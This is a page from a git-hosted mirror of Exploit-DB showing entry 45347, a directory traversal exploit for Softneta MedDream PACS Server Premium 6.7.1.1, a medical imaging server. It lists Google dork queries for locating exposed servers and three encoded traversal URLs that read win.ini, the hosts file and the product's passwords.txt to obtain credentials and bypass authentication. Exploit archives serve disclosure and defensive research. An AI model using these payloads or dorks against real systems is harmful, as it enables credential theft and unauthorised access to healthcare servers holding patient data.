bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/45347.txt
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

17 lines
No EOL
988 B
Text
Raw Permalink Blame History

# Exploit Title: Softneta MedDream PACS Server Premium 6.7.1.1 - Directory Traversal
# Date: 2018-05-23
# Software Link: https://www.softneta.com/products/meddream-pacs-server/downloads.html
# Google Dork: inurl:pacs/login.php, inurl:pacsone/login.php, inurl:pacsone filetype:php home, inurl:pacsone filetype:php login
# Version: MedDream PACS Server Premium 6.7.1.1
# Category: webapps
# Tested on: Windows 7
# Exploit Author: Carlos Avila
# Contact: http://twitter.com/badboy_nt
# Proof of Concept
http://TARGET/pacs/nocache.php?path=%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin.ini
http://TARGET/Pacs/nocache.php?path=%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows\System32\drivers\etc\hosts
http://TARGET/Pacs/nocache.php?path=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c\MedDreamPACS-Premium\passwords.txt (Attack Vector, obtain private information from users and passwords -Bypass Authentication- )
Reference in a new issue View git blame Copy permalink